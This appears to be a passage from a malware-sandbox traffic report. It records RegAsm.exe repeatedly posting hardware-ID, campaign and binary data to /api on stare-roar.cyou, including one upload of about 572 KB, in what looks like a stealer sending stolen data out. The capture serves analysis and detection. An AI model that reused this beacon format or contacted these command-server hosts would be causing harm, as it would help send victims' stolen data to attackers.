2024-12-11 09:45:09 UTC	15050	OUT	Data Raw: 2d 2d 41 59 36 38 57 47 33 4c 56 33 41 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 41 46 36 45 33 41 32 43 35 33 37 37 32 35 39 43 34 31 31 45 30 36 46 36 32 46 36 35 43 0d 0a 2d 2d 41 59 36 38 57 47 33 4c 56 33 41 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 59 36 38 57 47 33 4c 56 33 41 49 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 41 59 36 38 57 47 Data Ascii: --AY68WG3LV3AIHContent-Disposition: form-data; name="hwid"58EAF6E3A2C5377259C411E06F62F65C--AY68WG3LV3AIHContent-Disposition: form-data; name="pid"2--AY68WG3LV3AIHContent-Disposition: form-data; name="lid"yau6Na--6928154717--AY68WG
2024-12-11 09:45:10 UTC	1018	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=943hksgqlc3hlrjfp6spgp2k7r; expires=Sun, 06-Apr-2025 03:31:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jG67z%2FbOcEemZc4EmkhmRuLuqcuLm%2FSqmHavXUu87GEWPgb0wJ9WyeMY6zHMsF9xoS3c9dX1DlOG4piXUJOCI%2BUSLCBQht8VZmB9WOxqes14ioyiVSWW%2B8Yk2Vwaxf3N8bg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f048a4d8be6efa1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3521&min_rtt=1852&rtt_var=1880&sent=11&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15984&delivery_rate=1576673&cwnd=164&unsent_bytes=0&cid=c43d343508dcd6b5&ts=837&x=0"
2024-12-11 09:45:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-11 09:45:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49711	104.21.78.149	443	7688	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 09:45:12 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=KUEO9L8QHD User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20199 Host: stare-roar.cyou
2024-12-11 09:45:12 UTC	15331	OUT	Data Raw: 2d 2d 4b 55 45 4f 39 4c 38 51 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 41 46 36 45 33 41 32 43 35 33 37 37 32 35 39 43 34 31 31 45 30 36 46 36 32 46 36 35 43 0d 0a 2d 2d 4b 55 45 4f 39 4c 38 51 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 55 45 4f 39 4c 38 51 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 4b 55 45 4f 39 4c 38 51 48 44 0d 0a 43 6f 6e Data Ascii: --KUEO9L8QHDContent-Disposition: form-data; name="hwid"58EAF6E3A2C5377259C411E06F62F65C--KUEO9L8QHDContent-Disposition: form-data; name="pid"3--KUEO9L8QHDContent-Disposition: form-data; name="lid"yau6Na--6928154717--KUEO9L8QHDCon
2024-12-11 09:45:12 UTC	4868	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 e7 Data Ascii: >7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
2024-12-11 09:45:12 UTC	1011	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=7bedqu02fdjt3thf8adhstvf47; expires=Sun, 06-Apr-2025 03:31:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=inPAO6Y664%2BKzC76EYxcav5GmGVYVUkfEIzhe4mxJRI84UT5Cr3tRKvcaqJ5LhxAWo3AK2yjQpny2d5Zl8tBI2UZya0kiuEpFNYgBeFj0TlaazwNVRXOJ9WlE4xNZBOAego%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f048a5b2b5e43a7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1762&rtt_var=662&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2834&recv_bytes=21152&delivery_rate=1657207&cwnd=177&unsent_bytes=0&cid=7f4f72fc3674ea98&ts=915&x=0"
2024-12-11 09:45:12 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-11 09:45:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49712	104.21.78.149	443	7688	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 09:45:14 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=41NMUW4BQV5M User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1206 Host: stare-roar.cyou
2024-12-11 09:45:14 UTC	1206	OUT	Data Raw: 2d 2d 34 31 4e 4d 55 57 34 42 51 56 35 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 41 46 36 45 33 41 32 43 35 33 37 37 32 35 39 43 34 31 31 45 30 36 46 36 32 46 36 35 43 0d 0a 2d 2d 34 31 4e 4d 55 57 34 42 51 56 35 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 31 4e 4d 55 57 34 42 51 56 35 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 34 31 4e 4d 55 57 34 42 51 Data Ascii: --41NMUW4BQV5MContent-Disposition: form-data; name="hwid"58EAF6E3A2C5377259C411E06F62F65C--41NMUW4BQV5MContent-Disposition: form-data; name="pid"1--41NMUW4BQV5MContent-Disposition: form-data; name="lid"yau6Na--6928154717--41NMUW4BQ
2024-12-11 09:45:14 UTC	1008	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dknke69am0h3er5guabbfb1u5p; expires=Sun, 06-Apr-2025 03:31:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jT2v%2Bv4oSGMCjw1LbGWHwqhqo5HOoid7aetrTVYAoKiGU8NfNXTg1xwdPtaPkpMKP4Ph3syrtDSesWwfHy3XShP79GfyQWgW22mUQGc8kHfeKTDj2gFg79S3Cai26j85htQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f048a6948ff5e70-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1784&min_rtt=1784&rtt_var=669&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2116&delivery_rate=1634023&cwnd=228&unsent_bytes=0&cid=50d18c49d12860d4&ts=730&x=0"
2024-12-11 09:45:14 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 0d 0a Data Ascii: fok 8.46.123.175
2024-12-11 09:45:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49713	104.21.78.149	443	7688	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 09:45:16 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1LPXI41AB User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 572079 Host: stare-roar.cyou
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: 2d 2d 31 4c 50 58 49 34 31 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 45 41 46 36 45 33 41 32 43 35 33 37 37 32 35 39 43 34 31 31 45 30 36 46 36 32 46 36 35 43 0d 0a 2d 2d 31 4c 50 58 49 34 31 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 4c 50 58 49 34 31 41 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 39 32 38 31 35 34 37 31 37 0d 0a 2d 2d 31 4c 50 58 49 34 31 41 42 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: --1LPXI41ABContent-Disposition: form-data; name="hwid"58EAF6E3A2C5377259C411E06F62F65C--1LPXI41ABContent-Disposition: form-data; name="pid"1--1LPXI41ABContent-Disposition: form-data; name="lid"yau6Na--6928154717--1LPXI41ABContent
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: 15 ee 8b d5 e0 72 cc 35 d4 3b 97 1f dd f1 9d fe 53 d2 e5 b5 82 46 a4 0f ec e9 81 a8 df 36 4e c7 2a 0f 66 27 24 a8 ec ad 67 2d ea 85 9d 8e 7c 38 7b a8 4d 13 42 cf fb bc 53 81 ca 9b bc 62 21 17 94 e8 22 b5 04 41 65 b3 b9 4a 05 80 af b8 d9 64 bd f8 e8 f0 a4 3a 0f 33 cb 5c fa a5 8a 3f 94 5e b6 37 3c eb b9 68 2a 91 29 88 a0 6e b8 08 ff 7a 19 e6 08 96 ab 6f 9e 1b fe d9 c1 ca 78 45 9f 5d e5 05 bb 49 80 ea 19 09 96 f9 16 b3 b0 16 b8 2d eb f9 d4 d5 f4 f8 9b 32 32 f7 7a d3 da 59 6b 08 c1 aa eb f5 83 2f 57 ec 11 54 65 8b ff ef 61 cc 5e 2c 8c 0c c6 90 b5 d9 d3 00 e2 5e 35 9b 0f bb 02 4b 44 9b dc bc 8a 19 9e 8e 63 55 98 ab cb 52 ed 67 86 f2 6e e1 f3 19 da 79 53 dd 16 20 1f 87 e9 45 c2 bd bf 9d fa 66 21 ea eb b1 00 d5 4c d9 e8 7d 19 b6 65 18 c9 b6 50 d2 be bd 62 65 b2 Data Ascii: r5;SF6Nf'$g-\|8{MBSb!"AeJd:3\?^7<h)nzoxE]I-22zYk/WTea^,^5KDcURgnyS Ef!L}ePbe
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: 4d 0b e9 19 df 19 ff a9 66 16 14 f1 d4 b1 f9 01 e0 9e fb c9 ea fa c9 6b a0 8f 86 ff 3c e6 ad 3c 26 9a 1e a3 b9 e3 fa ab af 5e 17 fd a8 57 d9 d9 09 63 a5 2e 33 44 71 3c 23 fd 78 ed e4 31 49 24 1c c4 37 76 e5 f2 b1 7f 9e 85 be 4d cf 75 6e b2 bf 88 b2 94 0a 01 f7 29 f7 97 1f 4b 67 39 3d d2 c3 f1 89 29 1e e2 ee 16 83 4b 68 86 a1 04 28 d9 6d b2 27 f0 0c 1e 9f 70 61 69 e8 9f 78 d1 53 45 91 fb 0b 92 3c 60 b8 52 f7 45 f9 8a e0 8f 81 fe dc 7a fd a1 1f d6 82 f4 e2 48 69 61 e1 d9 4a d7 50 13 5e d1 f7 68 c2 d3 26 b8 a1 78 ac 19 a7 34 6e 0f 02 3f 68 f0 25 bc 23 44 84 bd 30 54 52 60 98 75 46 79 51 75 5b 2a 58 39 c7 ff 7c da 45 5c 1b ea b1 3e 31 7b ef de 9e 96 df 3c d2 6b 98 87 6f af 5d 77 77 b9 61 f1 75 94 f4 bd da ed 85 a5 e1 c2 7d 87 02 44 35 32 6f 02 dc b4 df da c2 Data Ascii: Mfk<<&^Wc.3Dq<#x1I$7vMun)Kg9=)Kh(m'paixSE<`REzHiaJP^h&x4n?h%#D0TR`uFyQu[*X9\|E\>1{<ko]wwau}D52o
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: 3f c8 45 b3 33 f1 f3 84 30 d7 ad ca fe e2 e2 91 2d d7 14 f1 14 f1 57 6a b3 4f 8a 99 e5 ca ff 6e 44 fa 71 e5 39 39 34 86 f5 af 0e d9 6f 06 1d e3 2d d4 5b 1e 28 d4 cc 61 ac 7d fd 6e 15 7b 88 ce 43 cd 45 9f 72 70 5c 75 0a 3f b4 31 e0 7e 5f f1 9e e6 a2 93 7c 72 d4 27 8d 97 2d 3f b1 37 6f 6d 3a 29 f5 7c ea 7d 63 a4 4e 0f ee cb 00 e4 3a 78 ad 14 35 b9 f5 72 e3 dd 98 16 9a 65 30 db c9 19 b8 a5 b3 2e 20 11 97 f7 23 83 5b 17 fd 49 d1 f8 11 5c df ee ef 20 0a 6a 7e 06 f7 9d fe ab 8e c3 9f 61 49 ef cd 16 29 94 b8 c4 0e 5f 6b d7 b4 d7 00 46 b0 c9 61 e1 b8 27 e1 07 ca 16 6f d1 6f f0 01 68 4e e2 80 35 31 95 b3 47 99 74 72 6e 51 75 d3 a0 9a c1 bc 30 22 13 f3 22 29 34 6a 54 88 22 74 a2 b6 65 c5 40 fe c1 a3 98 c6 e0 9a e2 ac bf f4 f6 63 fe e2 3b da b1 67 22 f4 d5 c4 44 7f Data Ascii: ?E30-WjOnDq994o-[(a}n{CErp\u?1~_\|r'-?7om:)\|}cN:x5re0. #[I\ j~aI)_kFa'oohN51GtrnQu0"")4jT"te@c;g"D
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: 05 0b 4f 9e a7 5b 09 dd 92 ca a9 d1 8f d1 8a 49 ac a2 5f 38 39 0d 7e f8 43 6f 4d b1 4a 21 b1 88 bf e0 e0 f2 7f 8d 7e 08 28 bc cb 5f 98 87 b9 80 01 5b 68 60 e0 03 cd 9b 23 64 99 53 8c 10 e9 56 d5 67 90 54 8f d7 4b df aa 43 c8 3c 68 38 82 a2 1f 9d fb 41 3f 9b c2 68 08 ef 13 c5 8f bc f5 35 d6 e7 78 ab 75 55 70 f0 2b ba 06 b6 2f 3e 77 cc 49 5e 15 17 44 c8 3c 7e 68 e2 1c ec 81 6f 94 18 4a ce 15 42 b8 ac 89 d3 58 16 b0 cd 90 5e 3a 33 94 5d 0c 78 81 34 e3 95 18 8f 08 78 8f 3f fa a2 7a 7b 25 dd 81 6a 22 63 72 92 bf 1c 3c cb 2e b8 8c 86 f9 04 d4 c1 cb 5c 9b 09 e8 14 1f 76 ed c9 8f aa d4 51 64 0e 36 2f 16 ff 74 43 d4 9e 71 2c 35 45 1c ef af 9d 59 c1 d9 87 8d 2c 91 77 80 32 7d 40 89 97 e8 9b 36 a1 fb a4 1a 63 60 48 a7 75 7b e6 fd 68 e2 2a ef 7b 59 6b d3 1b e1 73 21 Data Ascii: O[I_89~CoMJ!~(_[h`#dSVgTKC<h8A?h5xuUp+/>wI^D<~hoJBX^:3]x4x?z{%j"cr<.\vQd6/tCq,5EY,w2}@6c`Hu{h*{Yks!
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: 1f b0 3d 47 2f b5 19 cf dc 98 94 bc 20 ae ef bb e2 ea 75 90 ea 35 ab 24 17 11 28 74 98 d4 ec 18 46 1e c9 2e b4 19 99 57 dc 2f 5a 5d 65 f9 b5 d3 d8 ff a2 f6 a4 d1 a2 bb 57 4f 83 d1 2b 4c 34 68 2e e2 4c fe 3a 58 e7 7a 53 92 25 22 5c 79 26 c9 5d 2d 86 74 63 54 90 52 03 9f 61 3d 88 b8 29 b6 81 65 b7 fe a2 27 63 c7 23 d2 0b c0 98 c1 a6 be 5c b3 1e ef 7b b9 65 5c e0 69 52 4f 54 88 e5 b9 5b 8e bb 6e 14 b0 6c dd 32 cc ab 8c 77 29 9d a3 49 2e c4 50 53 99 cb 27 e3 ac ac 94 32 94 fb 62 33 c4 c4 e2 65 be ac fe ac cf 61 f2 f2 ff 20 9d a7 dd 9c c5 dc 97 9d d4 db dc 77 8e b5 95 21 f4 49 4e 6b 09 3c 89 6b 33 80 cf b2 dd 54 19 a5 92 cf 14 92 d4 05 f8 6a c2 7e b1 1a fe 11 a9 32 71 c2 55 e5 77 13 bc 05 0e 79 73 3a 4d 9d 12 a5 9e ad 4a a1 e8 ff 32 e7 5a 03 8b 39 76 eb 11 ef Data Ascii: =G/ u5$(tF.W/Z]eWO+L4h.L:XzS%"\y&]-tcTRa=)e'c#\{e\iROT[nl2w)I.PS'2b3ea w!INk<k3Tj~2qUwys:MJ2Z9v
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: fa 1f 5e 32 35 a7 18 2d 22 f0 c3 dc 1f a5 a9 dd 26 03 7f f5 10 f0 fb 94 1a 08 c4 96 7e 79 e6 dd 99 77 5d 4d bd cc 3e 75 66 30 f3 1a f5 8e 50 05 f0 f7 43 77 9f a6 9a 7f 25 82 df e5 be 4b 8f 1e 53 67 df ca 69 ef df 45 04 cd 86 60 ed 9e 0c 3c 89 b3 c7 93 e6 7c 36 b4 e4 60 8b c5 4d f3 74 5b 0f ae ce de ec 6b d4 c8 0a 52 63 eb 99 88 8f 93 97 37 b4 ce d1 a3 61 59 2c 8e 6d b1 a1 45 a2 9e 60 b5 5c e7 b4 b4 67 5e 25 a7 6c 48 5d 87 0e 26 44 b9 fb 3e dd 36 e7 91 4c 8c aa da e6 60 e0 e6 33 5c ad 91 ec d7 e4 91 5c 79 46 12 f6 74 d2 1e 29 93 dd 75 fa 09 12 da a1 f9 41 80 09 1b 79 14 cf 08 40 5d 91 c1 67 50 05 08 97 9c e8 33 d3 e4 f0 37 ba 76 4e f0 bc 2e c2 cf 05 ec a0 97 92 b0 5f ae 84 09 52 0e 0d 29 28 a7 95 72 fd 0e df 93 3a 31 ee e1 01 4a ff 11 f9 37 e3 55 3e 7a 5e Data Ascii: ^25-"&~yw]M>uf0PCw%KSgiE`<\|6`Mt[kRc7aY,mE`\g^%lH]&D>6L`3\\yFt)uAy@]gP37vN._R)(r:1J7U>z^
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: 37 71 d5 a1 3d 04 17 85 c8 cc fe cb c0 a6 d2 e9 9c 5e 3e f3 dd 86 7b 10 7e 9f cb 38 8c 9e 85 46 f5 bf 94 eb 03 c1 78 1c 90 07 1e 60 5f d3 e6 0b b5 27 49 56 85 a6 bc 36 25 fb 36 00 e4 e0 fe f7 01 e7 41 0e ef 9c b1 93 20 d9 f7 61 2a 5a 7b 2c b0 cf ef 86 c7 70 09 54 a1 97 5f af 06 91 4b e7 7e ad f7 e5 c5 26 25 db e2 02 d0 fd 6d 2e eb 63 b8 ac b8 8d 36 d1 f5 4c de fc 42 dd 45 dd bb 12 4c 19 e0 b0 62 f8 4f 00 27 8a e1 6d d6 8c 64 9c 39 31 f6 84 67 b8 64 d1 72 40 07 ae ca b2 59 5e f4 d5 c7 3c e7 3c 60 77 47 f6 16 df 4e 88 a0 34 0c b1 fe 9d c3 ad 36 5c 72 9d 85 40 03 0b 66 86 23 9d 32 6f df 8d 76 13 9f 2f da 5d de d6 96 52 be 97 bb be 31 c7 eb 56 ab e2 84 50 6c bf 17 e9 33 64 1c a3 58 f7 b2 35 20 10 b5 cc ea f1 12 4e 13 0b 9d 78 fc fb af 5f 89 5a b3 90 85 ab 2c Data Ascii: 7q=^>{~8Fx`_'IV6%6A a*Z{,pT_K~&%m.c6LBELbO'md91gdr@Y^<<`wGN46\r@f#2ov/]R1VPl3dX5 Nx_Z,
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: c8 44 64 42 80 f2 a2 fc e6 70 3d 37 51 87 41 ac 60 33 25 51 cc 96 d5 ea de 4a de b8 c8 bb 05 b7 f8 38 73 38 71 76 00 3b 0b a9 22 64 54 8f dc 0c dd 47 56 21 b9 b5 db 7a 8a 15 3e fe fb 6f 7a 1d 3a ff ab cb 11 aa 34 76 ff ec ab 79 2d 34 78 3f 6d ce 07 c8 d9 06 dc d3 14 14 62 ed d9 6f 70 65 5b 86 0f 3d 10 7d de d6 73 8e ad 23 e5 ad 07 12 ee d3 d2 fc b8 a2 01 60 73 0f 83 b9 56 1f 49 64 10 19 26 9a eb 0c 09 5f 92 82 e8 a5 c0 2e 43 54 48 85 31 82 18 0f 0b 21 4a b2 7c 57 6e b9 1e a1 85 cd 16 85 d4 68 b6 ae a9 61 df 95 80 ee 55 af ac 68 07 24 78 1a 90 f6 c6 ad c6 a6 d3 5f d9 43 e0 d3 1e 53 d7 6d 92 a4 ec 3a 13 74 ec cf 95 3c cd 3a 65 81 1b bd a9 ed 36 ce d1 ab cd eb b0 a7 48 e3 34 43 1e 9c f4 5c dd 3e 3e f2 3e 86 34 c5 4d 8a 30 bf 8f 71 a2 96 4a 38 b8 d3 bd 51 8d Data Ascii: DdBp=7QA`3%QJ8s8qv;"dTGV!z>oz:4vy-4x?mbope[=}s#`sVId&_.CTH1!J\|WnhaUh$x_CSm:t<:e6H4C\>>>4M0qJ8Q
2024-12-11 09:45:16 UTC	15331	OUT	Data Raw: 5f f7 6a 8e e1 dd 20 70 4f db 48 4f 23 c1 37 e7 d3 ac 34 be f2 a2 36 7e af 92 f1 e7 8e 6a b4 0c 94 f4 d9 c9 03 36 bf 23 27 1f 89 89 0c de fc 6b 9e 3f bc e7 61 7d 42 c4 ba 90 15 d2 ad be d5 71 36 1b 66 4b b2 84 51 40 fe d7 68 fe 0d 6b 67 96 c1 d1 2b 2c 11 f0 74 87 f3 af e4 8b 47 72 9c 85 19 99 b6 74 33 e3 4d 3c 5b 1c 65 55 e5 ca af eb 94 6a 21 bd bc a5 6d 64 4f 51 ed 09 c5 87 82 8d 27 48 0f b5 49 e5 1a 55 08 f2 56 7c ed fe e8 a9 ae cd 08 5d 5d f0 49 f4 d8 e3 ff 3e 26 4b c6 12 79 ca 8a 89 9a e2 0d 8a f4 86 b2 95 a2 e5 ef 58 99 39 cf 8a ea 0b 3f bc c3 eb 67 32 17 d8 1b 5c fb 98 4f 06 a3 61 73 2d e5 e1 44 af bf 99 1b a3 25 ec e0 c0 51 df 39 ca 80 c5 9f b5 4d ae 53 be c5 2e 93 0e 0a 2b 1b 8b 4f 10 63 ae 11 70 31 87 12 5e 8f 9b 1f 7f 9f 58 c0 f9 c5 f6 e1 2e 39 Data Ascii: _j pOHO#746~j6#'k?a}Bq6fKQ@hkg+,tGrt3M<[eUj!mdOQ'HIUV\|]]I>&KyX9?g2\Oas-D%Q9MS.+Ocp1^X.9
2024-12-11 09:45:20 UTC	1017	IN	HTTP/1.1 200 OK Date: Wed, 11 Dec 2024 09:45:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=m40d4qo63tiuo7akesmpekekoa; expires=Sun, 06-Apr-2025 03:31:58 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Klwc3b5YkbW1DxbfQOkadMgSsvvvnPFLYM6IFRM576dLhvrUc1tdIh%2FSqEHVTJsZtr55c4FYuZuvcvAF%2FxZeTPq1hk2CPugtfYEvoB7K5W2mlfsv83yfFuezFSDQGZmlWU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f048a798d895e7a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1569&rtt_var=595&sent=377&recv=599&lost=0&retrans=0&sent_bytes=2834&recv_bytes=574616&delivery_rate=1830721&cwnd=214&unsent_bytes=0&cid=82313837b1f69fad&ts=3888&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49715	104.21.78.149	443	7688	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-11 09:45:21 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 87 Host: stare-roar.cyou
